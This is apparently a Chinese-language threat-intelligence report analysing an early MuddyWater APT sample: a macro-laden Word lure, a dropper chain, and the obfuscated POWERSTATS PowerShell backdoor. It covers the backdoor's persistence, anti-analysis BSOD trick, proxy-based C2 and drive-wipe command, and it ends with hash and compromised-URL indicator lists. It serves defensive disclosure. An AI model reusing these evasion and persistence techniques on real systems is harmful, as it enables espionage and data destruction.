概述
MuddyWater APT组织于2017 年 2 月被Unit42披露命名,被认为是来源于中东地区的APT组织,主要针对周边国家及其他地区进行攻击。该组织早期的攻击活动与FIN7组织有关联,但由于其动机完全不同所以被划分为两个不同的组织。
MuddyWater组织的攻击通常始于向组织发送有针对性的电子邮件,然后从该组织内受感染的系统中窃取合法文件,然后将其武器化并分发给其他受害者。其攻击的特点是善于使用高度混淆的PowerShell后门,被称为POWERSTATS。
MuddyWater自被披露以来一直活跃,不断有安全公司披露相关新样本及其后门新变种,其攻击TTP也在不断更新。2018年5月以来其主要目标转移为中东地区的国家的电信和IT服务行业、政府机构和军事实体等[1]。
近日,奇安信威胁情报中心红雨滴团队捕获到一例样本,经分析为MuddyWater早期的样本,属于老样本新上传,鉴于POWERSTATS后门一直保持着较好的免杀效果,本文将对MuddyWater早期的攻击武器及攻击手法做一个剖析。本次捕获的诱饵文档如下图所示:
样本信息
本次捕获的样本与之前攻击手法一致,模糊背景,诱导受害者点击启用宏,样本基本信息如下:
|
文件名 |
3.doc |
|
MD5 |
eccb7346fca1032b8efdb8d458bbe53f |
|
文件格式 |
Word Document |
|
文件大小 |
651776 bytes |
详细分析
初始感染始于启用宏的Office 97-2003 Word文件,其宏通常设置了密码进行保护,以阻碍静态分析。
宏代码中主要负载部分由Base64编码,主要解密了三段加密内容,其宏的主要功能就是将解密的三段内容释放在“ProgramData”目录下,并为其分别命名
然后通过注册表启动项实现持久化
Dropper
上述释放的EventManager.logs,主要内容为通过scrobj.dll(Microsoft Scriptlet 库)注册释放的EventManager.dll。
而释放的EventManager.dll是一个xml文件,里面主要包含高度混淆的JS代码。
通过对JS代码的解密,最终获得一段 PowerShell 代码。
代码内容主要对释放的WindowsDefenderService.ini文件进行解密并执行,该文件解密后为一段混淆的PowerShell,即MuddyWater组织一直惯用的POWERSTATS后门。
对其进行多层解密后,得到一份勉强可阅读的代码。对其深入研究后,发现其函数名与部分变量名使用ROT13算法进行混淆,破除其混淆后,POWERSTATS后门完整暴露在视野中。
首先禁用office 的“宏警告”和“受保护的视图”,确保以后的攻击不需要和用户交互。设置允许宏代码访问内部 VBA 对象,以便在以后的攻击中更隐蔽地执行宏代码。以及设置注册表启动项,任务计划等实现持久化。
获取当前运行的进程,计算进程名称的校验和,如果与硬编码的校验和匹配,则会通过ntdll.dll 的NtRaiseHardError函数触发BSOD。
检测的进程名称如下:
|
win32_remote |
win64_remote64 |
ollydbg |
ProcessHacker |
|
tcpview |
autoruns |
filemon |
procmon |
|
regmon |
procexp |
idaq |
idaq64 |
|
ImmunityDebugger |
Wireshark |
dumpcap |
HookExplorer |
|
ImportREC |
PETools |
LordPE |
SysInspector |
|
proc_analyzer |
sysAnalyzer |
sniff_hit |
windbg |
|
joeboxcontrol |
joeboxserver |
解密随机代理的URL地址,通过使用随机代理来隐藏C2服务器的真实地址,受感染的端点随机连接到其中一个代理服务器,代理服务器又将信息中继到C2,以此来躲避追踪。
解密的部分代理URL:
接下来获取受害者的操作系统版本、内部IP、操作系统位数、计算机名、工作组、用户名加密后一起发送给上面随机获取的代理URL,用来注册一个新的受害者。这使得攻击者可以根据受害者的ip、国家、地理位置、目标企业等来接受或拒绝受害者。根据攻击者CnC的响应,受害者会被分配一个ID,这个ID与要执行的命令的每个请求一起发送给CnC。
判断c:programdata目录下是否包含杀软Kasper、 Panda、ESET、Symantec、McAfee,不包含则开始截图上传。将截图代码生成为c:programdataa.ps1脚本,使用DDEInitiate函数来执行,随后删除这个脚本,抹除痕迹。
解析返回的远控指令,完成对应操作,其指令功能如下:
|
指令 |
功能 |
|
reboot |
重启 |
|
shutdown |
关机 |
|
clean |
静默删除磁盘驱动器C、D、E、F,然后重新启动 |
|
screenshot |
截屏上传 |
|
upload |
下载文件 |
关联分析
通过对所捕获样本的攻击手法,代码逻辑层面分析,发现此次捕获的攻击样本与MuddyWater组织早期常用攻击手法,恶意代码基本一致。
通过对被感染的代理URL关联分析,也可以在VT上找到MuddyWater组织早期的相关样本。
|
文件名 |
Lisfon.exe |
|
MD5 |
fa200e715e856550c76f729604ebaf57 |
|
文件格式 |
Win32 EXE |
|
文件大小 |
95232 bytes |
总结
随着中东区域局势的演变,APT攻击也变得复杂不堪,均在互相刺探情报和从事间谍活动。为了避免被检测和保证攻击成功,MuddyWater的TTP也不断升级,从最初单一的POWERSTATS后门逐渐多元化,发展出Python、C#和PowerShell开发的RAT,甚至于包括Android平台的恶意软件。
MuddyWater一直以来擅长使用社会工程学进行鱼叉式网络钓鱼邮件攻击,本次捕获的样本中因初始宏解密释放的文件混淆严重,各大安全厂商的查杀率始终不高。MuddyWater也使用被感染的代理网站来中继真实C2的指令,较好的躲避了追踪。
此次捕获的样本主要针对中东地区开展攻击活动,暂未发现影响国内用户。奇安信红雨滴团队提醒广大用户,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行标题夸张的未知文件,不安装非正规途径来源的APP。做到及时备份重要文件,更新安装补丁。
若需运行,安装来历不明的应用,可先通过奇安信威胁情报文件深度分析平台(https://sandbox.ti.qianxin.com/sandbox/page)进行判别。目前已支持包括Windows、安卓平台在内的多种格式文件深度分析。
目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。
IOCs
MD5
eccb7346fca1032b8efdb8d458bbe53f
161c4a04ff1d64e750babcd6ead676e6
1def9f57402f69089f31357e578ef394
321d62fa4a7eaa8d19c3275d6775f55d
URL
hxxps://www.theharith.com/wp-includes/db-config-ini.php
hxxp://www.easy-home-sales.co.za/wp-includes/db-config-ini.php
hxxp://www.rashidalinawabshahi.com/ranwp/wp-admin/db-config-ini.php
hxxps://allinonebusinessresources.com/wp-includes/db-config-ini.php
hxxps://amishcountryfurnishings.com/awstats/db-config-ini.php
hxxp://vumavaluations.co.za//db-config-ini.php
hxxp://harryandbell.com/wp-admin/db-config-ini.php
hxxp://admiralgaragedoorrepair.com/wp-admin/db-config-ini.php
hxxp://viewphotos.co.za//db-config-ini.php
hxxp://supersavari.com/wp-admin/db-config-ini.php
hxxp://www.mzansicompanies.co.za/wp-includes/db-config-ini.php
hxxps://bloggingio.com//db-config-ini.php
hxxp://www.loansonhomes.co.za/wp-admin/db-config-ini.php
hxxp://ppe4u.co.za/system/db-config-ini.php
hxxp://www.gilforsenate.com//db-config-ini.php
hxxp://www.getcord.co.za/wp-admin/db-config-ini.php
hxxp://www.thusoconsulting.co.za/wp-admin/db-config-ini.php
hxxp://mgamule.co.za/css/db-config-ini.php
hxxp://chrisdejager-attorneys.co.za//db-config-ini.php
hxxp://sajidenterprises.com/contact/db-config-ini.php
hxxp://alxcorp.com/css/db-config-ini.php
hxxp://epss.ae/lib/db-config-ini.php
hxxp://canadianvc.com/includes/db-config-ini.php
hxxp://saacma.co.za//db-config-ini.php
hxxp://rsbholdings.co.za//db-config-ini.php
hxxp://adupree.com//db-config-ini.php
hxxp://www.atcouriers.co.za//db-config-ini.php
hxxp://transactionjunction.co.za//db-config-ini.php
hxxp://hisabati.com/include/mailchimp/db-config-ini.php
hxxp://www.duotonedigital.co.za//db-config-ini.php
hxxp://finalnewstv.com//db-config-ini.php
hxxp://www.tanati.co.za//db-config-ini.php
hxxp://emware.co.za/includes/db-config-ini.php
hxxp://breastfeedingbra.co.za//db-config-ini.php
hxxp://www.androidwikihow.com//db-config-ini.php
hxxp://cashforyousa.co.za/wpscripts/db-config-ini.php
hxxp://nolandsintl.com/templates/db-config-ini.php
hxxp://photoboothotm.co.za/components/db-config-ini.php
hxxp://roshnee.co.za//db-config-ini.php
hxxp://hesterwebber.co.za//db-config-ini.php
hxxp://sadcta-client.co.za/shopping/db-config-ini.php
hxxp://fickstarelectrical.co.za/DataCapture/db-config-ini.php
hxxp://xclusivenetwork.com/wp-includes/db-config-ini.php
hxxp://cc.com.pk/css/_vti_cnf/db-config-ini.php
hxxp://www.aoryx.ae/whitelilies.ae/db-config-ini.php
hxxp://pinnacleweld.co.za//db-config-ini.php
hxxp://airplussa.co.za/wp-admin/db-config-ini.php
hxxp://www.ieced.com.pk/wp-includes/db-config-ini.php
hxxp://foryou.guru/css/db-config-ini.php
hxxps://americanbrasil.com.br/downloader/db-config-ini.php
hxxp://oc.tsfengineering.com/resources/db-config-ini.php
hxxps://bigbaazaronline.com/wp-includes/db-config-ini.php
hxxp://jwseshowe.co.za/assets/db-config-ini.php
hxxp://goldeninstitute.co.za/contents/db-config-ini.php
hxxp://panathimaids.co.za/js/db-config-ini.php
hxxp://advss.co.za/images/db-config-ini.php
hxxp://ednpk.com//db-config-ini.php
hxxp://malbus.net/b/db-config-ini.php
hxxp://proeventsports.co.za/wp-admin/db-config-ini.php
hxxp://glenbridge.co.za//db-config-ini.php
hxxp://berped.co.za//db-config-ini.php
hxxp://best-digital-slr-cameras.com/privacy/db-config-ini.php
hxxps://kamas.pk/wp-admin/db-config-ini.php
hxxp://www.printinghub.co.za//db-config-ini.php
hxxps://cultofmobile.com/wp-includes/db-config-ini.php
hxxp://kkattorneys.com.pk/libraries/joomla/error/db-config-ini.php
hxxp://roseace.com.pk/components/com_djimageslider/db-config-ini.php
hxxp://www.bgoodideas.com/wp-includes/db-config-ini.php
hxxp://aljasar.com/Dining-Trendz/db-config-ini.php
hxxp://vatmiddleeast.com//wp-content/themes/twentyseventeen/inc/db-config-ini.php
hxxp://www.evoko.ae//db-config-ini.php
hxxp://totallyfreepeoplesearch.org//db-config-ini.php
hxxp://www.exuberant-group.com/wp-includes/db-config-ini.php
hxxp://delectronics.com.pk//db-config-ini.php
hxxp://www.bashancorp.co.za//db-config-ini.php
hxxp://bitsym.com/wp-content/plugins/duplicate-page/db-config-ini.php
hxxp://www.penisdevelopmentcentre.co.za//db-config-ini.php
hxxp://visionclinic.co.ls/includes/db-config-ini.php
hxxp://fgpcw-kr.edu.pk/wp-admin/includes/db-config-ini.php
hxxp://gemana.ae/wp-includes/db-config-ini.php
hxxp://bmctelecom.ae/test/shamayal/db-config-ini.php
hxxps://www.addsaintgaudens.com/wp-admin/db-config-ini.php
hxxp://www.buhlebayoacademy.com//db-config-ini.php
hxxp://capitalradiopetition.co.za/script/db-config-ini.php
hxxp://koldpressjuice.com/wp-includes/Requests/db-config-ini.php
hxxp://victorypipe.com.pk/wp-includes/db-config-ini.php
hxxp://vintage.ae//wp-includes/Text/Diff/db-config-ini.php
hxxp://almaqsd.com/wp-admin/db-config-ini.php
hxxp://www.diginixtech.com//db-config-ini.php
hxxp://www.sorumvar.net//db-config-ini.php
hxxp://bios-chip.co.za//db-config-ini.php
hxxp://www.crissamconsulting.co.za//db-config-ini.php
hxxp://capriflower.co.za//db-config-ini.php
hxxp://www.dingaanassociates.co.za/wp-includes/db-config-ini.php
hxxp://apidubai.ae/themes/en/db-config-ini.php
hxxp://batistadopovosjc.org.br//db-config-ini.php
hxxp://indiba-africa.co.za/includes/db-config-ini.php
hxxp://sprintpackersnmovers.com/spmbeta/db-config-ini.php
hxxp://www.proxelinternational.co.za/engine1/db-config-ini.php
hxxp://ngomahconstruction.co.za/js/db-config-ini.php
hxxp://clandecor.co.za/rvsUtf8Backup/db-config-ini.php
hxxp://bakron.co.za//db-config-ini.php
hxxp://plexsolutions.co.za/wp-includes/db-config-ini.php
hxxp://regionprinters.com/wp-admin/db-config-ini.php
hxxp://gsnconsulting.co.za/wp-admin/db-config-ini.php
hxxp://aahung.org/assets/db-config-ini.php
hxxp://heritagetravelmw.com//db-config-ini.php
hxxp://shgida.com/wp-includes/customize/db-config-ini.php
hxxp://www.afikaquadpro.com//db-config-ini.php
hxxps://news9pakistan.com/wp-admin/db-config-ini.php
hxxp://havilahglo.co.za/wpimages/db-config-ini.php
hxxp://www.paktechinfo.com/wp-includes/db-config-ini.php
hxxp://gcmbdin.edu.pk//db-config-ini.php
hxxp://www.thoughtsandthings.co.za/wp-includes/db-config-ini.php
hxxp://clouditzone.com/revolution/assets/db-config-ini.php
hxxp://rollotech.co.za//db-config-ini.php
hxxp://genesisbs.co.za//db-config-ini.php
hxxps://www.bornear.com/components/db-config-ini.php
hxxp://insafradio.pk/his/db-config-ini.php
hxxp://www.harmonyguesthouse.co.za/wp-includes/db-config-ini.php
hxxp://www.cle.ae//db-config-ini.php
hxxp://triumphsportscarclub-kzn.co.za//db-config-ini.php
hxxp://www.mycogentrading.com//db-config-ini.php
hxxp://betatechnologiesme.com//db-config-ini.php
hxxp://pgpaltex.co.za//db-config-ini.php
hxxp://strictlybusiness.co.za/wpscripts/db-config-ini.php
hxxp://www.volleybold.com//templates/system/db-config-ini.php
hxxp://dusttek.com.tr/yonet/tinymce/examples/db-config-ini.php
hxxp://zafarhalalmeat.com.pk//db-config-ini.php
hxxp://desirablehair.co.za/documents/db-config-ini.php
hxxp://comsip.org.mw/sync/db-config-ini.php
hxxp://www.wbdrivingschool.com//db-config-ini.php
hxxp://jdcorporate.co.za/multiseller/db-config-ini.php
hxxp://jumpstart.ae//db-config-ini.php
hxxps://www.tsmgranite.com//db-config-ini.php
hxxps://boatwif.co.uk/wp-includes/db-config-ini.php
hxxp://www.soccerkidsdubai.com//wp-content/plugins/db-config-ini.php
hxxp://adsbook.co.za/a/db-config-ini.php
hxxp://hashtag.com.pk/test/db-config-ini.php
hxxp://host4unix.net/jorani/db-config-ini.php
hxxp://mepure.com/wp-includes/widgets/db-config-ini.php
hxxp://dorakiletisim.com/resimler/dorak/db-config-ini.php
hxxp://tosmacakes.co.za//db-config-ini.php
hxxp://seloanaholdings.co.za/js/db-config-ini.php
hxxp://jvpsfunerals.co.za//db-config-ini.php
hxxp://absfinancialplanning.co.za/images/db-config-ini.php
hxxp://tcpbereka.co.za/js/db-config-ini.php
hxxp://www.nalitravel.co.za//db-config-ini.php
hxxp://simplyplumbing.co.za//db-config-ini.php
hxxp://investaholdings.co.za/htc/db-config-ini.php
hxxp://djtrina.com/wp-includes/theme-compat/db-config-ini.php
hxxp://sallyscott.co.za/templates/db-config-ini.php
hxxp://findinfo-more.com//db-config-ini.php
hxxp://www.amazingtour.pk//db-config-ini.php
hxxp://rmbmanufactures.co.za//db-config-ini.php
hxxp://web28tech.co.za/weather/db-config-ini.php
hxxp://irshadfoundation.co.za//db-config-ini.php
hxxp://nabtires.com/z-backup/search/db-config-ini.php
hxxp://cds.org.pk//db-config-ini.php
hxxp://ladiescircle.co.za/wp-admin/db-config-ini.php
hxxps://betterstep.ae/wp-admin/db-config-ini.php
hxxp://luxconprojects.co.za/wp-includes/db-config-ini.php
hxxp://wegallop.com//db-config-ini.php
hxxp://www.10shapes.com/wp-includes/db-config-ini.php
hxxp://sinebar.co.za//db-config-ini.php
hxxp://www.hfhl.org.ls/images/db-config-ini.php
hxxp://laraibgroup.com/plugins/editors/tinymce/db-config-ini.php
hxxp://beachroad.ae/wp-includes/IXR/db-config-ini.php
hxxp://ventronics.co.za/vent1/db-config-ini.php
hxxp://www.speedmasterprinters.co.za//db-config-ini.php
hxxp://www.ffc.com.pk/wp-admin/includes/db-config-ini.php
hxxp://cemsolutions.org/wp-admin/db-config-ini.php
hxxp://www.ipripak.org/wp-includes/theme-compat/db-config-ini.php
hxxp://awuav.world//db-config-ini.php
hxxp://albedogida.com/Eski_web/db-config-ini.php
hxxp://bluewaves.ae/switcher/js/db-config-ini.php
hxxp://nakoserum.com/wp-admin/includes/db-config-ini.php
hxxp://aniroleplay.net//db-config-ini.php
hxxp://bgpsouthasia.com/tracking/db-config-ini.php
hxxp://fccltest.nayatel.com/wp-includes/theme-compat/db-config-ini.php
hxxp://welcomecaters.com/wp-includes/db-config-ini.php
hxxp://www.galwayprimary.co.za//db-config-ini.php
hxxp://pmdpk.com//db-config-ini.php
hxxp://cambridgetuts.com/css/db-config-ini.php
hxxps://lahorewholesalemarket.com/wp-admin/db-config-ini.php
hxxp://mepetresources.com/website/db-config-ini.php
hxxp://anzanihealth.co.za/wpimages/db-config-ini.php
hxxp://gvs.com.pk/font-awesome/db-config-ini.php
hxxp://geetransfers.co.za/font-awesome/db-config-ini.php
hxxp://dmc.gov.pk/libraries/phpmailer/db-config-ini.php
hxxp://elevate.ae/wp-includes/SimplePie/db-config-ini.php
hxxp://rsmaluminium.co.za//db-config-ini.php
hxxp://carlagrobler.co.za/components/db-config-ini.php
hxxp://paksteel.com//db-config-ini.php
hxxp://azadpattanhpp.com/xfiles/db-config-ini.php
hxxp://www.blaahblaah.com/Snaps/db-config-ini.php
hxxp://wmcsoj.edu.pk//db-config-ini.php
hxxp://lensofafrica.co.za/wpscripts/db-config-ini.php
hxxps://artumus.co.za//db-config-ini.php
hxxp://greenacrestf.co.za/video/db-config-ini.php
hxxp://www.tonaro.co.za/wp-includes/db-config-ini.php
hxxp://rmbmanufacturers.co.za/DataCapture/db-config-ini.php
hxxp://simpexbpo.com/wp-includes/db-config-ini.php
hxxp://ambiances-toiles.fr//db-config-ini.php
hxxp://tepsecurity.co.za//db-config-ini.php
hxxp://tophillsports.com/wp-includes/db-config-ini.php
hxxp://chrishanicdc.org/wpimages/db-config-ini.php
hxxp://www.britishasia-equip.co.uk//db-config-ini.php
hxxp://assemblee-nationale.cg/image/db-config-ini.php
hxxp://bonasfalogtrans.com/images/db-config-ini.php
hxxp://sonafoundation.org.pk//db-config-ini.php
hxxp://entracorntrading.co.za//db-config-ini.php
hxxps://dailysportsgossips.com/wp-includes/db-config-ini.php
hxxp://plantconsultants.co.za//db-config-ini.php
hxxp://chickenandkitchen.com//db-config-ini.php
hxxp://suzzyshuttles.co.za//db-config-ini.php
hxxp://siyabuselelatransport.co.za/swf/db-config-ini.php
hxxps://www.hosthof.com/phpmailer/db-config-ini.php
hxxp://assuredfirst.com/wp-includes/db-config-ini.php
hxxp://signsoftime.co.za/user/db-config-ini.php
hxxp://neomfarming.com//db-config-ini.php
hxxp://mumtazandbrohi.com/wp-includes/db-config-ini.php
hxxp://immaculatepainters.co.za/upload/db-config-ini.php
hxxp://charispaarl.co.za//db-config-ini.php
hxxp://indlovusecurity.co.za//db-config-ini.php
hxxp://www.aladiyat.ae/centers/db-config-ini.php
hxxp://www.popfilms.co.za//db-config-ini.php
hxxp://atexmodels.co.za//db-config-ini.php
hxxp://www.s5ncertificationservices.co.za//db-config-ini.php
hxxp://mhealth.ae//db-config-ini.php
hxxp://www.terapine.com//db-config-ini.php
hxxp://botanikbahcesi.com/test/db-config-ini.php
hxxp://fragranceoil.co.za/wp-includes/db-config-ini.php
hxxp://gbti.org.pk/public_html/js/db-config-ini.php
hxxp://tippinggate.co.za/training/db-config-ini.php
hxxp://aqlaal.com/wp-includes/SimplePie/db-config-ini.php
hxxp://comfortex.co.za/php/db-config-ini.php
hxxp://deepgraphics.co.za//db-config-ini.php
hxxp://www.icapmecareers.com/wp-includes/db-config-ini.php
hxxps://iconicciti.com//db-config-ini.php
hxxp://mukhtarfeeds.com//db-config-ini.php
hxxp://souqwalls.com/wp-includes/rest-api/db-config-ini.php
hxxp://www.malboer.co.za/trendy1/db-config-ini.php
hxxp://sefikengfarm.co.ls//db-config-ini.php
hxxp://dailyqadamat.com//db-config-ini.php
hxxp://www.thelightcleaning.co.za/wp-admin/db-config-ini.php
hxxp://passright.co.za//db-config-ini.php
hxxp://aboutduvetcovers.com/Seller/db-config-ini.php
hxxp://www.britishofficefitout.com//db-config-ini.php
hxxp://seismicfactory.co.za/wp-admin/db-config-ini.php
hxxp://abadleabantu.co.za/fonts/db-config-ini.php
hxxp://mountsinaischool.edu.pk/wp-includes/theme-compat/db-config-ini.php
hxxp://www.gooline.net//db-config-ini.php
hxxp://africangypsyjazz.com/libraries/db-config-ini.php
hxxps://aquabsafe.com/wp-admin/db-config-ini.php
hxxp://pkix.pk//db-config-ini.php
hxxp://ahworld.com.pk/docs/products/heating-products/db-config-ini.php
hxxp://3axis.co/wp-admin/includes/db-config-ini.php
hxxp://chinamall.co.za//db-config-ini.php
hxxp://www.waohost.com/wp-includes/db-config-ini.php
hxxp://utor.co.za//db-config-ini.php
hxxp://www.odcpkintranet.org/wp-admin/includes/db-config-ini.php
hxxp://tombstonedesigns.co.za/libraries/db-config-ini.php
hxxp://yogakidsuae.com//wp-includes/customize/db-config-ini.php
hxxp://rashidalinawabshahi.com/ranwp/db-config-ini.php
hxxp://bmasokaprojects.co.za//db-config-ini.php
hxxp://whitepearlpro.co.za/font/db-config-ini.php
hxxp://itengineering.co.za/gatewaydiamond/db-config-ini.php
hxxp://arm.net.pk//db-config-ini.php
hxxp://www.acer-parts.co.za//db-config-ini.php
hxxp://simpowerlogistics.co.za//db-config-ini.php
hxxp://buildingstandards.com.pk/wp-admin/db-config-ini.php
hxxp://thepianostudio.co.za/wp-includes/db-config-ini.php
hxxp://mzuzulionsclub.org/modules/db-config-ini.php
hxxp://10x10guru.com//db-config-ini.php
hxxp://www.abies.co.za/wp-includes/db-config-ini.php
hxxp://candidsourcing.com/wp-includes/db-config-ini.php
hxxp://pkproud.com/roshitrust/db-config-ini.php
hxxp://ldams.org.ls/supplies/db-config-ini.php
hxxp://addorg.org/wp-includes/db-config-ini.php
hxxp://menaboracks.co.za/tmp/db-config-ini.php
hxxp://www.oursort.co.za/timothyowenauthor/db-config-ini.php
hxxps://bloggertemplates4u.com//db-config-ini.php
hxxp://boardaffairs.com/wpscripts/db-config-ini.php
hxxp://macleodphotography.com/theme/db-config-ini.php
hxxp://capetownway.co.za/wp-includes/db-config-ini.php
hxxp://www.tntfire.co.za/wp-admin/db-config-ini.php
hxxp://hartenboswaterpark.co.za/templates/db-config-ini.php
hxxp://fccorp.co.za/php/db-config-ini.php
hxxp://www.dws-gov.co.za/wp-admin/db-config-ini.php
hxxp://baksapk.com//db-config-ini.php
hxxp://embali.co.za/php/db-config-ini.php
hxxp://infomate.biz//db-config-ini.php
hxxp://worshipaltar.co.za/components/db-config-ini.php
hxxp://allhandshygiene.co.za//db-config-ini.php
hxxps://www.logicsfort.com/font-awesome/db-config-ini.php
hxxp://www.afikapower.com//db-config-ini.php
hxxp://verifiedseller.co.za/js/db-config-ini.php
hxxp://www.mumtazandbrohi.com/coughingdish/93grahammiller/db-config-ini.php
hxxp://onspotlinks.co.za/upload/db-config-ini.php
hxxp://cdxtrading.co.za//db-config-ini.php
hxxp://vital.com.pk//db-config-ini.php
hxxp://glgroup.co.za/images/db-config-ini.php
hxxp://www.gokhantemiz.com/wp-content/languages/plugins/db-config-ini.php
hxxp://www.triconfabrication.com/wp-admin/db-config-ini.php
hxxp://buboobioinnovations.co.za/wpimages/db-config-ini.php
hxxp://www.galaxyforwarders.com/wp-includes/random_compat/db-config-ini.php
hxxp://www.advcadsys.com/wp-includes/db-config-ini.php
hxxp://thebedspace.com/wp-includes//db-config-ini.php
hxxp://isibaniedu.co.za/admin/db-config-ini.php
hxxp://www.exomi.es/wp-admin/db-config-ini.php
hxxp://dianakleyn.co.za/layouts/db-config-ini.php
hxxp://themotoringcalendar.co.za/wp-includes/db-config-ini.php
hxxp://canbeginsaat.com/madmin/include/db-config-ini.php
hxxp://www.after.vix.br//db-config-ini.php
hxxp://9newshd.com/smf/wp-admin/db-config-ini.php
hxxp://www.gooline.pk/bridge2cart/db-config-ini.php
hxxp://highschoolsuperstar.co.za/files/db-config-ini.php
hxxp://thedailymusicshow.com/wp-admin/db-config-ini.php
hxxp://dubaihelishow.com/tmp/db-config-ini.php
hxxp://cafawelding.co.za/font-awesome/db-config-ini.php
hxxp://www.edesignz.co.za/wp-admin/db-config-ini.php
hxxp://www.buy4you.pk/wp-includes/db-config-ini.php
hxxp://centuryacademy.co.za/css/db-config-ini.php
hxxp://ceramica.co.za//db-config-ini.php
hxxp://airtronuae.com//db-config-ini.php
hxxp://mediaology.com.pk/wp-includes/db-config-ini.php
hxxp://eastrandmotorlab.co.za/fleet/db-config-ini.php
hxxp://stevegardens.co.za/php/db-config-ini.php
hxxp://www.mikimaths.com/wp-admin/db-config-ini.php
hxxp://hjb-racing.co.za/htdocs/db-config-ini.php
hxxp://www.smartoools.co.za//db-config-ini.php
hxxp://vhuenilodge.co.za/php/db-config-ini.php
hxxp://wavecafe.co.za//db-config-ini.php
hxxp://tuules.com//db-config-ini.php
hxxp://www.wmcpk.org/wp/wp-includes/db-config-ini.php
hxxp://www.zamilindustrial.com/akib/db-config-ini.php
hxxp://www.iancullen.co.za//db-config-ini.php
hxxp://anythingispossible.world/wp-includes/db-config-ini.php
hxxp://jeanetteproperties.co.za//db-config-ini.php
hxxp://tradernox.com/wp-includes/widgets/db-config-ini.php
hxxp://weinvest.co.za//db-config-ini.php
hxxp://blackgoldoilserv.com//db-config-ini.php
hxxp://www.rejoicetheatre.com//db-config-ini.php
hxxp://capitalexchange.ae/capital_files/db-config-ini.php
hxxp://dummy.celerosnetworks.com/wp-content/plugins/duplicate-page/db-config-ini.php
hxxp://dpscdgkhan.edu.pk/shopping/db-config-ini.php
hxxp://edgeforensic.co.za//db-config-ini.php
hxxp://willpowerpos.co.za//db-config-ini.php
hxxp://ramzcapital.com//db-config-ini.php
hxxp://www.alshohub.org/NewsLetter/db-config-ini.php
hxxp://colenesphotography.co.za/administrator/db-config-ini.php
hxxp://ecology.haglerbailly.com.pk//db-config-ini.php
hxxp://www.theguitarstudio.co.za//db-config-ini.php
hxxp://softwarehub.co.za/layouts/db-config-ini.php
hxxp://fbrvolume.co.za//db-config-ini.php
hxxp://risabaattorneys.com//db-config-ini.php
hxxp://dubaigip.com//db-config-ini.php
hxxp://www.bbconlinenetwork.com/wp-includes/db-config-ini.php
hxxp://panfam.co.za//db-config-ini.php
hxxp://reatlegile.com/upload/db-config-ini.php
hxxp://www.khotsonglodge.co.ls/wp-admin/db-config-ini.php
hxxp://www.goolineb2b.com/wp-includes/db-config-ini.php
hxxp://erniecommunications.co.za/css/db-config-ini.php
hxxp://salmanandassociates.com.pk//db-config-ini.php
hxxp://promechtransport.co.za/include/db-config-ini.php
hxxp://rightwayfoundationpk.org/wp-admin/db-config-ini.php
hxxp://centuriongsd.co.za//db-config-ini.php
hxxp://delcom.co.za//db-config-ini.php
hxxp://www.andrebruton.com//db-config-ini.php
hxxp://h-dubepromotions.co.za//db-config-ini.php
hxxp://ambientmoon.co.za//db-config-ini.php
hxxp://www.ultrapexsustainable.org.za//db-config-ini.php
hxxp://crystaltidings.co.za//db-config-ini.php
hxxp://diegemmerkat.co.za/wp-includes/db-config-ini.php
hxxp://funisalodge.co.za/data1/db-config-ini.php
hxxp://arabaemlak.com/magaza/cgi-bin/db-config-ini.php
hxxps://eurospa.ae/wp-includes/db-config-ini.php
hxxp://experttutors.co.za//db-config-ini.php
hxxps://www.cartridgecave.co.za/wp-admin/db-config-ini.php
hxxp://ecs-consult.com/components/db-config-ini.php
hxxp://oftheearthphotography.com/www/db-config-ini.php
hxxp://hmholdings360.co.za/wp-admin/db-config-ini.php
hxxp://joyngroup.com//db-config-ini.php
hxxp://hybridauto.co.za/photography/db-config-ini.php
hxxp://www.vhupo-tours.com/wp-includes/db-config-ini.php
hxxp://seoinlahorepakistan.com/clockwork/db-config-ini.php
hxxp://africanpixels.zar.cc/includes/db-config-ini.php
hxxp://doggypetstore.com//db-config-ini.php
hxxp://adambaluch.ae/wp-includes/Requests/Utility/db-config-ini.php
hxxp://ryanchristiefurniture.co.za//db-config-ini.php
hxxp://evansmokaba.com/evansmokaba.com/thabiso/db-config-ini.php
hxxps://afrikitti.com//db-config-ini.php
hxxp://www.fun4kidz.co.za//db-config-ini.php
hxxp://www.infratechconsulting.com//db-config-ini.php
hxxp://www.snackattack.co.za//db-config-ini.php
hxxp://www.proplumbing.co.za/wp-admin/db-config-ini.php
hxxp://sipambi-projects.co.za//db-config-ini.php
hxxp://solartree.pk//db-config-ini.php
hxxp://charliewestsecurity.co.za//db-config-ini.php
hxxps://zasamag.com/wp-includes/db-config-ini.php
hxxp://superdelight.co.za/livezilla/db-config-ini.php
hxxp://www.execwash.ae//db-config-ini.php
hxxp://moonsteel.ae//wp-content/themes/twentyfifteen/genericons/db-config-ini.php
hxxp://www.waterforevents.co.za//db-config-ini.php
hxxp://servicebox.co.za//db-config-ini.php
hxxp://globalelectricalandconstruction.co.za/wpscripts/db-config-ini.php
hxxp://skyblueprint.co.za/scripts/db-config-ini.php
hxxp://www.sowetojive.co.za//db-config-ini.php
hxxp://ushostinc.com/Slider/db-config-ini.php
hxxps://alceharfield.com//db-config-ini.php
hxxp://indocraft.co.za/test/db-config-ini.php
hxxps://awebcommerce.com/wp-admin/db-config-ini.php
hxxp://w1africa.co/crmsugar/db-config-ini.php
hxxp://sullivanprimary.co.za/wp-admin/db-config-ini.php
hxxp://www.rcpk.co.za//db-config-ini.php
hxxp://jakobieducation.co.za//db-config-ini.php
hxxp://globaltransformers.com/wp-admin/db-config-ini.php
hxxp://abvsecurity.co.za//db-config-ini.php
hxxp://tlcservers.co.za//db-config-ini.php
hxxp://pamudzi.co.za/wp-includes/db-config-ini.php
hxxp://shullen.co.za//db-config-ini.php
hxxp://www.daleth.co.za/wp-includes/db-config-ini.php
hxxp://opendisclosure.org.za//db-config-ini.php
hxxp://winagainstebola.com/assets/db-config-ini.php
hxxp://permanite.co.za/wp-includes/db-config-ini.php
hxxp://onlinenews.com.pk//db-config-ini.php
hxxp://afrogeo.com/afroweb/db-config-ini.php
hxxp://reniko.co.za/wp-admin/db-config-ini.php
hxxp://bm360.com.pk//db-config-ini.php
hxxp://tawaair.com//db-config-ini.php
hxxp://ancoeng.co.za//db-config-ini.php
hxxp://irfanandirfan.com/irfanadnirfan/db-config-ini.php
hxxp://www.peoplealley.com/wp-admin/db-config-ini.php
hxxp://lahorecoolingtower.com//db-config-ini.php
